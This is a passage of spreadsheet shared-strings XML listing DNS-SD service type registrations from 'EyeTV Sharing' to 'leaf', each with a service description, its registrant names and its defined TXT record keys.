    <t>EyeTV Sharing</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers=1, keyhash=&lt;4 bytes&gt;</t>
  </si>
  <si>
    <t>facespan</t>
  </si>
  <si>
    <t>FaceSpan</t>
  </si>
  <si>
    <t>[Kerry_Hazelgren]</t>
  </si>
  <si>
    <t>faxstfx</t>
  </si>
  <si>
    <t>FAXstf</t>
  </si>
  <si>
    <t>[Smith_Micro]</t>
  </si>
  <si>
    <t>feed-sharing</t>
  </si>
  <si>
    <t>NetNewsWire 2.0</t>
  </si>
  <si>
    <t>[Ranchero_Software]</t>
  </si>
  <si>
    <t>feldwesen</t>
  </si>
  <si>
    <t>proprietary</t>
  </si>
  <si>
    <t>[Kiel_University_of_Applied_Sciences]</t>
  </si>
  <si>
    <t>[Matthias-Christian_Ott]</t>
  </si>
  <si>
    <t>firetask</t>
  </si>
  <si>
    <t>Firetask task sharing and synchronization protocol</t>
  </si>
  <si>
    <t>[Gerald_Aquila]</t>
  </si>
  <si>
    <t>fish</t>
  </si>
  <si>
    <t>Fish</t>
  </si>
  <si>
    <t>[Oriol_Ferrer_Mesia]</t>
  </si>
  <si>
    <t>fix</t>
  </si>
  <si>
    <t>Financial Information Exchange (FIX) Protocol</t>
  </si>
  <si>
    <t>[Joakim_Johansson]</t>
  </si>
  <si>
    <t>Defined TXT keys:   Currently valid enumerated values:
   FIX Session Protocol Versions (SESSIONVERSION): 1.1
   FIX Application Protocol Versions (APPLICATIONVERSION): 2.7, 3.0, 4.0, 4.1, 4.2, 4.3, 4.4, 5.0
  Possible TXT records defined and their values (replace uppercase text with enumerations from the list above):
   txtvers=1
   fix=APPLICATIONVERSION
   fix supported=APPLICATIONVERSION[,APPLICATIONVERSION, ... ,APPLICATIONVERSION]
   fixt=SESSIONVERSION</t>
  </si>
  <si>
    <t>fjork</t>
  </si>
  <si>
    <t>Fjork</t>
  </si>
  <si>
    <t>[John_Schilling]</t>
  </si>
  <si>
    <t>fl-purr</t>
  </si>
  <si>
    <t>FilmLight Cluster Power Control Service</t>
  </si>
  <si>
    <t>[Darrin_Smart]</t>
  </si>
  <si>
    <t>flightdmp</t>
  </si>
  <si>
    <t>Flight Data Monitoring Protocol</t>
  </si>
  <si>
    <t>[Brad_Head]</t>
  </si>
  <si>
    <t>flir-ircam</t>
  </si>
  <si>
    <t>FLIR Infrared Camera</t>
  </si>
  <si>
    <t>[FLIR_Systems_AB]</t>
  </si>
  <si>
    <t>[Bjorn_Roth][Klas_Malmborg]</t>
  </si>
  <si>
    <t>fmserver-admin</t>
  </si>
  <si>
    <t>FileMaker Server Administration Communication Service</t>
  </si>
  <si>
    <t>[Eric_Jacobson]</t>
  </si>
  <si>
    <t>fontagentnode</t>
  </si>
  <si>
    <t>FontAgent Pro</t>
  </si>
  <si>
    <t>[Insider_Software]</t>
  </si>
  <si>
    <t>foxtrot-serv</t>
  </si>
  <si>
    <t>FoxTrot Search Server Discovery Service</t>
  </si>
  <si>
    <t>[Jerome_Seydoux]</t>
  </si>
  <si>
    <t>foxtrot-start</t>
  </si>
  <si>
    <t>FoxTrot Professional Search Discovery Service</t>
  </si>
  <si>
    <t>frameforge-lic</t>
  </si>
  <si>
    <t>FrameForge License</t>
  </si>
  <si>
    <t>[James_W_Walker]</t>
  </si>
  <si>
    <t>freehand</t>
  </si>
  <si>
    <t>FreeHand MusicPad Pro Interface Protocol</t>
  </si>
  <si>
    <t>[Ted_Schroeder]</t>
  </si>
  <si>
    <t>frog</t>
  </si>
  <si>
    <t>Frog Navigation Systems</t>
  </si>
  <si>
    <t>[Rene_Jager]</t>
  </si>
  <si>
    <t>Defined TXT keys: type, name, id</t>
  </si>
  <si>
    <t>ftpcroco</t>
  </si>
  <si>
    <t>Crocodile FTP Server</t>
  </si>
  <si>
    <t>[Xnet_Communications]</t>
  </si>
  <si>
    <t>fv-cert</t>
  </si>
  <si>
    <t>Fairview Certificate</t>
  </si>
  <si>
    <t>[Jim_Lyle_2]</t>
  </si>
  <si>
    <t>Defined TXT keys: DevID=&lt;device id&gt;, DevPK=&lt;device public key&gt;</t>
  </si>
  <si>
    <t>fv-key</t>
  </si>
  <si>
    <t>Fairview Key</t>
  </si>
  <si>
    <t>Defined TXT keys: KeyID=&lt;device id&gt;</t>
  </si>
  <si>
    <t>fv-time</t>
  </si>
  <si>
    <t>Fairview Time/Date</t>
  </si>
  <si>
    <t>g2metric-lynx</t>
  </si>
  <si>
    <t>Used for the Lynx System</t>
  </si>
  <si>
    <t>[G2_Metric]</t>
  </si>
  <si>
    <t>[Paul_Forsans]</t>
  </si>
  <si>
    <t>garagepad</t>
  </si>
  <si>
    <t>Entrackment Client Service</t>
  </si>
  <si>
    <t>[Talkative_AB]</t>
  </si>
  <si>
    <t>giffer</t>
  </si>
  <si>
    <t>gif collection browsing</t>
  </si>
  <si>
    <t>[Taber_Buhl]</t>
  </si>
  <si>
    <t>Defined TXT keys: version=&lt;protocol version&gt;</t>
  </si>
  <si>
    <t>gforce-ssmp</t>
  </si>
  <si>
    <t>G-Force Control via SoundSpectrum's SSMP TCP Protocol</t>
  </si>
  <si>
    <t>[Andy_O_Meara]</t>
  </si>
  <si>
    <t>glasspad</t>
  </si>
  <si>
    <t>GlassPad Data Exchange Protocol</t>
  </si>
  <si>
    <t>[Emmanuel_Merali]</t>
  </si>
  <si>
    <t>Defined TXT keys: guid</t>
  </si>
  <si>
    <t>glasspadserver</t>
  </si>
  <si>
    <t>GlassPadServer Data Exchange Protocol</t>
  </si>
  <si>
    <t>glrdrvmon</t>
  </si>
  <si>
    <t>OpenGL Driver Monitor</t>
  </si>
  <si>
    <t>googexpeditions</t>
  </si>
  <si>
    <t>Service related to Google Expeditions which is a technology for enabling multi-participant virtual fieldtrip experiences over a local wireless network. See http://g.co/expeditions for more details</t>
  </si>
  <si>
    <t>googlecast</t>
  </si>
  <si>
    <t>Service related to Google Cast which is a technology for enabling multi-screen experiences. See developers.google.com/cast for more details</t>
  </si>
  <si>
    <t>goorstop</t>
  </si>
  <si>
    <t>For iOS Application named GoOrStop</t>
  </si>
  <si>
    <t>[Charlie_Kim]</t>
  </si>
  <si>
    <t>gopro-wake</t>
  </si>
  <si>
    <t>GoPro proprietary protocol to wake devices</t>
  </si>
  <si>
    <t>[GoPro]</t>
  </si>
  <si>
    <t>[Joe_Enke]</t>
  </si>
  <si>
    <t>Defined TXT keys: model, fw_version, platform_version, protocol_version, mac_address</t>
  </si>
  <si>
    <t>gopro-web</t>
  </si>
  <si>
    <t>GoPro proprietary protocol for devices</t>
  </si>
  <si>
    <t>gotit</t>
  </si>
  <si>
    <t>Network name Got It!</t>
  </si>
  <si>
    <t>[Bill_Vlahos]</t>
  </si>
  <si>
    <t>Defined TXT keys: info=name</t>
  </si>
  <si>
    <t>gpnp</t>
  </si>
  <si>
    <t>Grid Plug and Play</t>
  </si>
  <si>
    <t>grillezvous</t>
  </si>
  <si>
    <t>Roxio ToastAnywhere(tm) Recorder Sharing</t>
  </si>
  <si>
    <t>Defined TXT keys: AppID=&lt;application id&gt; KeyHash=&lt;application license key hash&gt;</t>
  </si>
  <si>
    <t>groovesquid</t>
  </si>
  <si>
    <t>Groovesquid Democratic Music Control Protocol</t>
  </si>
  <si>
    <t>[www_nsovocal_com]</t>
  </si>
  <si>
    <t>[Ruben_Beltran]</t>
  </si>
  <si>
    <t>growl</t>
  </si>
  <si>
    <t>Growl</t>
  </si>
  <si>
    <t>gsremotecontrol</t>
  </si>
  <si>
    <t>General Satellite set-top box remote control</t>
  </si>
  <si>
    <t>[General_Satellite]</t>
  </si>
  <si>
    <t>[Sergey_Zubov]</t>
  </si>
  <si>
    <t>Defined TXT keys:  None</t>
  </si>
  <si>
    <t>gucam-http</t>
  </si>
  <si>
    <t>Image Data Transfer API for Wi-Fi Camera Devices over HTTP</t>
  </si>
  <si>
    <t>[Ripplex_Inc]</t>
  </si>
  <si>
    <t>[Hiroshi_Matsuda]</t>
  </si>
  <si>
    <t>Defined TXT keys: device-name=&lt;name of camera device&gt;</t>
  </si>
  <si>
    <t>guid</t>
  </si>
  <si>
    <t>Special service type for resolving by GUID (Globally Unique Identifier)</t>
  </si>
  <si>
    <t>Defined TXT keys: Varies; Depends on type of service being offered/resolved
Although DNS-SD does not recommend or advocate using GUIDs as the primary name
of an offered service why not?, it does support use of GUIDs as service names
where developers want to use them that way.
Typically users do not browse for GUIDs. They are not user-friendly and not very
informative. Typically, the service is advertised as usual, using a user-friendly
name. One of the TXT record attributes is a GUID for the service instance.
Once the user has browsed and chosen the desired service instance via its user-friendly
name, the service is resolved, the TXT record is retrieved, and the GUID is stored.
A given network service instance is therefore being advertised two ways, for example:
    &lt;User-Friendly-Name&gt;._ptp._tcp.local
    &lt;GUID&gt;._guid._tcp.local
On subsequent accesses to the service, the GUID-based name is resolved, and that
particular service instance is discovered, even if the user has subsequently
changed the user-friendly name to something else.
Note: Although each different logical service type needs to have its own different
DNS-SD service type, all GUID-based names use the same pseudo-type: "_guid._tcp".
There is no possibility of name conflict because (by definition) GUIDs are globally unique.</t>
  </si>
  <si>
    <t>h323</t>
  </si>
  <si>
    <t>H.323 Real-time audio, video and data communication call setup protocol</t>
  </si>
  <si>
    <t>[Will_MacDonald]</t>
  </si>
  <si>
    <t>hbbtv-ait</t>
  </si>
  <si>
    <t>HbbTV Application Information Table</t>
  </si>
  <si>
    <t>[HbbTV_Association]</t>
  </si>
  <si>
    <t>[Paul_Higgs]</t>
  </si>
  <si>
    <t>HELP command</t>
  </si>
  <si>
    <t>[RFC1078]</t>
  </si>
  <si>
    <t>TCP Port Service Multiplexer (TCPMUX)</t>
  </si>
  <si>
    <t>hg</t>
  </si>
  <si>
    <t>Mercurial web-based repository access</t>
  </si>
  <si>
    <t>Defined TXT keys: None
  path=&lt;file system pathname to repository&gt;
  description=&lt;descriptive name of repository&gt;</t>
  </si>
  <si>
    <t>hinz</t>
  </si>
  <si>
    <t>HINZMobil Synchronization protocol</t>
  </si>
  <si>
    <t>[Jorg_Laschke]</t>
  </si>
  <si>
    <t>hmcp</t>
  </si>
  <si>
    <t>Home Media Control Protocol</t>
  </si>
  <si>
    <t>[Will_Lahr]</t>
  </si>
  <si>
    <t>hola</t>
  </si>
  <si>
    <t>An application to communicate with other</t>
  </si>
  <si>
    <t>[Navneet_Gupta]</t>
  </si>
  <si>
    <t>home-sharing</t>
  </si>
  <si>
    <t>iTunes Home Sharing</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, hQ, iTSh Version, MID, Database ID, dmb, Version, OSsi, hG, hC, Machine ID</t>
  </si>
  <si>
    <t>homeauto</t>
  </si>
  <si>
    <t>iDo Technology Home Automation Protocol</t>
  </si>
  <si>
    <t>[Tony_de_Rijk]</t>
  </si>
  <si>
    <t>homeconnect</t>
  </si>
  <si>
    <t>Home Connect Protocol</t>
  </si>
  <si>
    <t>[BSH_Bosch_und_Siemens_Hausgeraete_GmbH]</t>
  </si>
  <si>
    <t>[Jens_Clauss]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers + Proprietary</t>
  </si>
  <si>
    <t>homekit</t>
  </si>
  <si>
    <t>Protocol for home hub communication</t>
  </si>
  <si>
    <t>[Apple_Inc_4]</t>
  </si>
  <si>
    <t>[Matthew_Lucas]</t>
  </si>
  <si>
    <t>Defined TXT keys: Name, sw</t>
  </si>
  <si>
    <t>honeywell-vid</t>
  </si>
  <si>
    <t>Honeywell Video Systems</t>
  </si>
  <si>
    <t>[Shankar_Prasad]</t>
  </si>
  <si>
    <t>hotwayd</t>
  </si>
  <si>
    <t>Hotwayd</t>
  </si>
  <si>
    <t>howdy</t>
  </si>
  <si>
    <t>Howdy messaging and notification protocol</t>
  </si>
  <si>
    <t>[Ozate_Inc]</t>
  </si>
  <si>
    <t>[Joseph_Sickel]</t>
  </si>
  <si>
    <t>Defined TXT keys: vers</t>
  </si>
  <si>
    <t>hpdeviceinfo</t>
  </si>
  <si>
    <t>The service provides information about connected HP devices</t>
  </si>
  <si>
    <t>[HP_Inc]</t>
  </si>
  <si>
    <t>[Sanjay_Kumar]</t>
  </si>
  <si>
    <t>Defined TXT keys: vers=&lt;version&gt;</t>
  </si>
  <si>
    <t>hpr-bldlnx</t>
  </si>
  <si>
    <t>HP Remote Build System for Linux-based Systems</t>
  </si>
  <si>
    <t>[Jeffrey_J_Walls]</t>
  </si>
  <si>
    <t>Defined TXT keys: rh73, rhel3, rhel4, deb31, suse102</t>
  </si>
  <si>
    <t>hpr-bldwin</t>
  </si>
  <si>
    <t>HP Remote Build System for Microsoft Windows Systems</t>
  </si>
  <si>
    <t>Defined TXT keys: xp, vista</t>
  </si>
  <si>
    <t>hpr-db</t>
  </si>
  <si>
    <t>Identifies systems that house databases for the Remote Build System and Remote Test System</t>
  </si>
  <si>
    <t>Defined TXT keys: bld, tst, mstr</t>
  </si>
  <si>
    <t>hpr-rep</t>
  </si>
  <si>
    <t>HP Remote Repository for Build and Test Results</t>
  </si>
  <si>
    <t>Defined TXT keys: bld, tst, official</t>
  </si>
  <si>
    <t>hpr-toollnx</t>
  </si>
  <si>
    <t>HP Remote System that houses compilers and tools for Linux-based Systems</t>
  </si>
  <si>
    <t>hpr-toolwin</t>
  </si>
  <si>
    <t>HP Remote System that houses compilers and tools for Microsoft Windows Systems</t>
  </si>
  <si>
    <t>hpr-tstlnx</t>
  </si>
  <si>
    <t>HP Remote Test System for Linux-based Systems</t>
  </si>
  <si>
    <t>hpr-tstwin</t>
  </si>
  <si>
    <t>HP Remote Test System for Microsoft Windows Systems</t>
  </si>
  <si>
    <t>hs-off</t>
  </si>
  <si>
    <t>Hobbyist Software Off Discovery</t>
  </si>
  <si>
    <t>[Rob_Jonson]</t>
  </si>
  <si>
    <t>htsp</t>
  </si>
  <si>
    <t>Home Tv Streaming Protocol</t>
  </si>
  <si>
    <t>[Andreas_Oman]</t>
  </si>
  <si>
    <t>HTTP over SSL/TLS</t>
  </si>
  <si>
    <t>Web browsers like Safari and Internet Explorer (with the Bonjour for Windows plugin)
      DO NOT browse for DNS-SD service type "_https._tcp" in addition to browsing for "_http._tcp".
      This is a conscious decision to reduce proliferation of service types, to help keep
      DNS-SD efficient on the network. Today, if a user types http://www.mybank.com/ into their
      web browser, the web server automatically redirects the user to https://www.mybank.com/.
      Rather than having an entirely different DNS-SD service type for https, we recommend
      using the same redirection mechanism: advertise a plain "http" service, which consists
      of nothing except an HTTP redirection to the desired "https" URL.
      Work is currently being done on adding mechanisms to HTTP and TLS to allow the server
      to tell the client that it needs to activate TLS on the current connection before
      proceeding. If this becomes widely adopted, it further justifies the decision to
      not create a separate DNS-SD service type "_https._tcp", because security becomes
      just another one of the things that is negotiated on a per-connection basis (like
      content-type negotiation today) rather than being an entirely separate thing.</t>
  </si>
  <si>
    <t>htvncconf</t>
  </si>
  <si>
    <t>HomeTouch Vnc Configuration</t>
  </si>
  <si>
    <t>[Yuval_Rakavy]</t>
  </si>
  <si>
    <t>hue</t>
  </si>
  <si>
    <t>Philips hue protocol</t>
  </si>
  <si>
    <t>[Signify]</t>
  </si>
  <si>
    <t>[Walter_Slegers]</t>
  </si>
  <si>
    <t>Defined TXT keys: bridgeid, modelid</t>
  </si>
  <si>
    <t>huesync</t>
  </si>
  <si>
    <t>Philips Hue Sync control protocol</t>
  </si>
  <si>
    <t>[Twan_Kamp]</t>
  </si>
  <si>
    <t>Defined TXT keys: name, devicetype, uniqueid, path</t>
  </si>
  <si>
    <t>hyperstream</t>
  </si>
  <si>
    <t>Atempo HyperStream deduplication server</t>
  </si>
  <si>
    <t>[Laurent_Charmet]</t>
  </si>
  <si>
    <t>Defined TXT keys:   version=x.y.z.w
  uuid=&lt;36 bytes UUID string&gt;
  host=&lt;real host name&gt;</t>
  </si>
  <si>
    <t>iad1</t>
  </si>
  <si>
    <t>BBN IAD</t>
  </si>
  <si>
    <t>This service name is no longer in use.</t>
  </si>
  <si>
    <t>iad2</t>
  </si>
  <si>
    <t>iad3</t>
  </si>
  <si>
    <t>iaudit</t>
  </si>
  <si>
    <t>Braemar Inventory audit</t>
  </si>
  <si>
    <t>[Braemar_Consulting]</t>
  </si>
  <si>
    <t>[Richard_Thompson]</t>
  </si>
  <si>
    <t>ibiz</t>
  </si>
  <si>
    <t>iBiz Server</t>
  </si>
  <si>
    <t>[IGG_Software]</t>
  </si>
  <si>
    <t>ica-networking</t>
  </si>
  <si>
    <t>Image Capture Networking</t>
  </si>
  <si>
    <t>[Baskaran_Subramaniam]</t>
  </si>
  <si>
    <t>ican</t>
  </si>
  <si>
    <t>Northrup Grumman/TASC/ICAN Protocol</t>
  </si>
  <si>
    <t>[Laurent_Mihalkovic]</t>
  </si>
  <si>
    <t>ichalkboard</t>
  </si>
  <si>
    <t>iChalk</t>
  </si>
  <si>
    <t>[Math_Game_House_Soft]</t>
  </si>
  <si>
    <t>ichat</t>
  </si>
  <si>
    <t>iChat 1.0</t>
  </si>
  <si>
    <t>[Jens_Alfke]</t>
  </si>
  <si>
    <t>ici</t>
  </si>
  <si>
    <t>ICI</t>
  </si>
  <si>
    <t>[Brent_Hines]</t>
  </si>
  <si>
    <t>iconquer</t>
  </si>
  <si>
    <t>iConquer</t>
  </si>
  <si>
    <t>[Andrew_Zamler_Carhar]</t>
  </si>
  <si>
    <t>icontrolbox</t>
  </si>
  <si>
    <t>A Remote Control Application service used to control Computers on a Local Area Network</t>
  </si>
  <si>
    <t>[Umair_Cheema]</t>
  </si>
  <si>
    <t>idata</t>
  </si>
  <si>
    <t>Generic Data Acquisition and Control Protocol</t>
  </si>
  <si>
    <t>[Carson_Fenimore]</t>
  </si>
  <si>
    <t>idcws</t>
  </si>
  <si>
    <t>Intermec Device Configuration Web Services</t>
  </si>
  <si>
    <t>Defined TXT keys: version=&lt;x.xx&gt;</t>
  </si>
  <si>
    <t>ideaquest</t>
  </si>
  <si>
    <t>IDEAQUEST Safety Monitoring System</t>
  </si>
  <si>
    <t>[IDEAQUEST_Inc.]</t>
  </si>
  <si>
    <t>[Kimitaka_KAWAGUCHI]</t>
  </si>
  <si>
    <t>idsync</t>
  </si>
  <si>
    <t>SplashID Synchronization Service</t>
  </si>
  <si>
    <t>[Justin_Cepelak]</t>
  </si>
  <si>
    <t>iffl</t>
  </si>
  <si>
    <t>iFFL Bonjour service for communication between client and server applications.</t>
  </si>
  <si>
    <t>[Kevin_Gregory]</t>
  </si>
  <si>
    <t>ifolder</t>
  </si>
  <si>
    <t>Published iFolder</t>
  </si>
  <si>
    <t>ihouse</t>
  </si>
  <si>
    <t>Idle Hands iHouse Protocol</t>
  </si>
  <si>
    <t>[Toby_Smith]</t>
  </si>
  <si>
    <t>ii-drills</t>
  </si>
  <si>
    <t>Instant Interactive Drills</t>
  </si>
  <si>
    <t>[Ricky_Sharp]</t>
  </si>
  <si>
    <t>ii-konane</t>
  </si>
  <si>
    <t>Instant Interactive Konane</t>
  </si>
  <si>
    <t>ilynx</t>
  </si>
  <si>
    <t>iLynX</t>
  </si>
  <si>
    <t>[iOS_Software]</t>
  </si>
  <si>
    <t>im</t>
  </si>
  <si>
    <t>Instant Messaging</t>
  </si>
  <si>
    <t>[RFC3861]</t>
  </si>
  <si>
    <t>imagescal</t>
  </si>
  <si>
    <t>ImagesCal App Data Sharing</t>
  </si>
  <si>
    <t>[Three_Lights_Software_LLC]</t>
  </si>
  <si>
    <t>[Gus_Asadi]</t>
  </si>
  <si>
    <t>imidi</t>
  </si>
  <si>
    <t>iMidi</t>
  </si>
  <si>
    <t>[Robert_Grant]</t>
  </si>
  <si>
    <t>imgsync</t>
  </si>
  <si>
    <t>Protocol synchronizing Image data</t>
  </si>
  <si>
    <t>Defined TXT keys: srvver, mf, md, mn, tid, srv, sid, myhwa, imglist, devAid, serAid, vever</t>
  </si>
  <si>
    <t>ims-ni</t>
  </si>
  <si>
    <t>Noise Inspector</t>
  </si>
  <si>
    <t>[IMS_merilni_sistemi]</t>
  </si>
  <si>
    <t>[Metod_Celestina]</t>
  </si>
  <si>
    <t>Defined TXT keys:  SN (serial number), SVER (software version), HVER (hardware version), PVER (protocol version))</t>
  </si>
  <si>
    <t>indigo-dvr</t>
  </si>
  <si>
    <t>Indigo Security Digital Video Recorders</t>
  </si>
  <si>
    <t>[Haram_Lee]</t>
  </si>
  <si>
    <t>infboard</t>
  </si>
  <si>
    <t>InfBoard interactive whiteboard protocol</t>
  </si>
  <si>
    <t>[Eric_Sean_Conner]</t>
  </si>
  <si>
    <t>informacast</t>
  </si>
  <si>
    <t>Listing Singlewire InformaCast servers</t>
  </si>
  <si>
    <t>[Singlewire_Software_LLC]</t>
  </si>
  <si>
    <t>[Jerry_Steinhauer]</t>
  </si>
  <si>
    <t>innergroup</t>
  </si>
  <si>
    <t>Service for a Communications App</t>
  </si>
  <si>
    <t>[Santo_Porpiglia]</t>
  </si>
  <si>
    <t>inova-ontrack</t>
  </si>
  <si>
    <t>Inova Solutions OnTrack Display Protocol</t>
  </si>
  <si>
    <t>iot</t>
  </si>
  <si>
    <t>Internet-of-things (IoT) JSON telegram service</t>
  </si>
  <si>
    <t>[SEVENSTAX_GmbH]</t>
  </si>
  <si>
    <t>[Ralf_Schwarzer]</t>
  </si>
  <si>
    <t>Defined TXT keys: &lt;type&gt;:application specific kind of protocol; 
      &lt;vers&gt;:version of the 'type'; &lt;device&gt;:device descriptor</t>
  </si>
  <si>
    <t>iota</t>
  </si>
  <si>
    <t>iotaMed medical records server</t>
  </si>
  <si>
    <t>[MITM]</t>
  </si>
  <si>
    <t>[Martin_Wehlou]</t>
  </si>
  <si>
    <t>ipbroadcaster</t>
  </si>
  <si>
    <t>IP Broadcaster</t>
  </si>
  <si>
    <t>ipspeaker</t>
  </si>
  <si>
    <t>IP Speaker Control Protocol</t>
  </si>
  <si>
    <t>[Dan_Mahn]</t>
  </si>
  <si>
    <t>iqp</t>
  </si>
  <si>
    <t>Control protocol for Phase One devices</t>
  </si>
  <si>
    <t>[Phase_One]</t>
  </si>
  <si>
    <t>[Christopher_Jacobsen]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers,mk,md,us,un,ss,auth</t>
  </si>
  <si>
    <t>irc-iot</t>
  </si>
  <si>
    <t>The universal protocol for building IoT</t>
  </si>
  <si>
    <t>[Alexey_Y_Woronov]</t>
  </si>
  <si>
    <t>Defined TXT keys: _irc-iot</t>
  </si>
  <si>
    <t>ir-hvac-000</t>
  </si>
  <si>
    <t>HVAC SMIL Server</t>
  </si>
  <si>
    <t>[Ingersoll_Rand_Inc]</t>
  </si>
  <si>
    <t>[John_Taylor]</t>
  </si>
  <si>
    <t>irelay</t>
  </si>
  <si>
    <t>iRelay application discovery service</t>
  </si>
  <si>
    <t>[Marc_Diamante]</t>
  </si>
  <si>
    <t>irmc</t>
  </si>
  <si>
    <t>Intego Remote Management Console</t>
  </si>
  <si>
    <t>[Olivier_Delecluse]</t>
  </si>
  <si>
    <t>Defined TXT keys: RMC Client Version=&lt;version&gt;, MAC Address=&lt;address&gt;</t>
  </si>
  <si>
    <t>irobotmcs</t>
  </si>
  <si>
    <t>iRobot Monitor and Control Service</t>
  </si>
  <si>
    <t>[iRobot_Corporation]</t>
  </si>
  <si>
    <t>[Tim_Farlow]</t>
  </si>
  <si>
    <t>iroid-sd</t>
  </si>
  <si>
    <t>Iroid Data Service Discovery</t>
  </si>
  <si>
    <t>[iroÃ¯d]</t>
  </si>
  <si>
    <t>[Tom_Wagner]</t>
  </si>
  <si>
    <t>irradiatd-iclip</t>
  </si>
  <si>
    <t>iClip clipboard transfer</t>
  </si>
  <si>
    <t>[Irradiated_Software]</t>
  </si>
  <si>
    <t>[Thomas_Tempelmann]</t>
  </si>
  <si>
    <t>irt-sharing</t>
  </si>
  <si>
    <t>Image Resizer Toolbox preview sharing service</t>
  </si>
  <si>
    <t>[fnxsoftware.com]</t>
  </si>
  <si>
    <t>[Juan_Guerrero]</t>
  </si>
  <si>
    <t>Defined TXT keys: irtshrng</t>
  </si>
  <si>
    <t>isparx</t>
  </si>
  <si>
    <t>iSparx</t>
  </si>
  <si>
    <t>[Philipp_Dreiss]</t>
  </si>
  <si>
    <t>ispq-vc</t>
  </si>
  <si>
    <t>iSpQ VideoChat</t>
  </si>
  <si>
    <t>[Chris_Silverberg]</t>
  </si>
  <si>
    <t>ishare</t>
  </si>
  <si>
    <t>iShare</t>
  </si>
  <si>
    <t>[Steve_Dekorte]</t>
  </si>
  <si>
    <t>isticky</t>
  </si>
  <si>
    <t>iSticky</t>
  </si>
  <si>
    <t>[Insist]</t>
  </si>
  <si>
    <t>istorm</t>
  </si>
  <si>
    <t>iStorm</t>
  </si>
  <si>
    <t>isynchronize</t>
  </si>
  <si>
    <t>iSynchronize data synchronization protocol</t>
  </si>
  <si>
    <t>[Smart_Apps_LTD]</t>
  </si>
  <si>
    <t>[Sergey_Bolshedvorsky]</t>
  </si>
  <si>
    <t>itap-publish</t>
  </si>
  <si>
    <t>iTap Publishing Service</t>
  </si>
  <si>
    <t>[HLW_Software_Development_GmbH]</t>
  </si>
  <si>
    <t>[Michael_Lacher]</t>
  </si>
  <si>
    <t>Defined TXT keys: uuid=&lt;unique server key&gt;</t>
  </si>
  <si>
    <t>itis-device</t>
  </si>
  <si>
    <t>IT-IS International Ltd. Device</t>
  </si>
  <si>
    <t>[Ben_Webster]</t>
  </si>
  <si>
    <t>Defined TXT keys:   type=&lt;product type&gt;
  configuration=&lt;product configuration&gt;
  description=&lt;human readable description&gt;
  version=&lt;device and protocol version&gt;</t>
  </si>
  <si>
    <t>itsrc</t>
  </si>
  <si>
    <t>iTunes Socket Remote Control</t>
  </si>
  <si>
    <t>[Kevin_Leacock]</t>
  </si>
  <si>
    <t>ivef</t>
  </si>
  <si>
    <t>Inter VTS Exchange Format</t>
  </si>
  <si>
    <t>[Harry_ten_Berge]</t>
  </si>
  <si>
    <t>iwork</t>
  </si>
  <si>
    <t>iWork Server</t>
  </si>
  <si>
    <t>jcan</t>
  </si>
  <si>
    <t>Northrup Grumman/TASC/JCAN Protocol</t>
  </si>
  <si>
    <t>jeditx</t>
  </si>
  <si>
    <t>Jedit X</t>
  </si>
  <si>
    <t>[Satoshi_Matsumoto]</t>
  </si>
  <si>
    <t>jini</t>
  </si>
  <si>
    <t>Jini Service Discovery</t>
  </si>
  <si>
    <t>[Daniel_Steinberg]</t>
  </si>
  <si>
    <t>jmap</t>
  </si>
  <si>
    <t>JSON Meta Application Protocol</t>
  </si>
  <si>
    <t>[RFC8620]</t>
  </si>
  <si>
    <t>This service name was previously assigned under the
      name "JSON Mail Access Protocol". This has been de-assigned and
      re-assigned with the approval of the previous assignee.</t>
  </si>
  <si>
    <t>jnx-kcsync</t>
  </si>
  <si>
    <t>jollys keychain cloud sync protocol</t>
  </si>
  <si>
    <t>[Patrick_Stein]</t>
  </si>
  <si>
    <t>Defined TXT keys: hash=&lt;40hex characters&gt;
      salt=&lt;40hex characters&gt;
      uuid=&lt;40hex characters&gt;
      Example:
      hash=5e7580598c0d7064d4fc79faaeb42585e1a675f8
      salt=f0164cb3a0c3d7efe75abea8fda86d2d56c8dda9
      uuid=db61dc092922252e45bbb264f59147138c7fd5fa</t>
  </si>
  <si>
    <t>jtag</t>
  </si>
  <si>
    <t>jukebox</t>
  </si>
  <si>
    <t>Jukebox Request Service</t>
  </si>
  <si>
    <t>[Gary_Giebler_2]</t>
  </si>
  <si>
    <t>jukejoint</t>
  </si>
  <si>
    <t>Music sharing protocol</t>
  </si>
  <si>
    <t>[Phrenetic_Apps_LLC]</t>
  </si>
  <si>
    <t>[Christopher_Pow]</t>
  </si>
  <si>
    <t>keynoteaccess</t>
  </si>
  <si>
    <t>KeynoteAccess is used for sending remote requests/responses when controlling a slideshow with Keynote Remote</t>
  </si>
  <si>
    <t>[Apple]</t>
  </si>
  <si>
    <t>[Brad_Vaughan]</t>
  </si>
  <si>
    <t>keynotepairing</t>
  </si>
  <si>
    <t>KeynotePairing is used to pair Keynote Remote with Keynote</t>
  </si>
  <si>
    <t>kiwin</t>
  </si>
  <si>
    <t>Topology Discovery</t>
  </si>
  <si>
    <t>[Stephen_kiwin_PALM]</t>
  </si>
  <si>
    <t>Defined TXT keys: kiwin, top</t>
  </si>
  <si>
    <t>ktp</t>
  </si>
  <si>
    <t>Kabira Transaction Platform</t>
  </si>
  <si>
    <t>[Ramiro_Sarmiento]</t>
  </si>
  <si>
    <t>kyma</t>
  </si>
  <si>
    <t>Symbolic Sound Kyma Service Discovery</t>
  </si>
  <si>
    <t>[Symbolic_Sound_Corporation]</t>
  </si>
  <si>
    <t>[Kurt_Hebel]</t>
  </si>
  <si>
    <t>la-maint</t>
  </si>
  <si>
    <t>IMP Logical Address Maintenance</t>
  </si>
  <si>
    <t>labyrinth</t>
  </si>
  <si>
    <t>Labyrinth local multiplayer protocol</t>
  </si>
  <si>
    <t>[Andreas_Alptun]</t>
  </si>
  <si>
    <t>lan2p</t>
  </si>
  <si>
    <t>Lan2P Peer-to-Peer Network Protocol</t>
  </si>
  <si>
    <t>[Ben_Guild]</t>
  </si>
  <si>
    <t>lapse</t>
  </si>
  <si>
    <t>Gawker</t>
  </si>
  <si>
    <t>[Phil_Piwonka]</t>
  </si>
  <si>
    <t>larvaio-control</t>
  </si>
  <si>
    <t>Larva IP Controller</t>
  </si>
  <si>
    <t>[larva.io_ltd]</t>
  </si>
  <si>
    <t>[Reijo_Sirila]</t>
  </si>
  <si>
    <t>leaf</t>
  </si>
  <si>
    <t>Lua Embedded Application Framework</t>
  </si>
  <si>
    <t>[Ico_Doornekamp]</t>
  </si>
  <si>
    <t>Defined TXT keys:   name=&lt;readable name&gt;
  product=&lt;product name/model&gt;
  version=&lt;version number&gt;</t>
  </si>
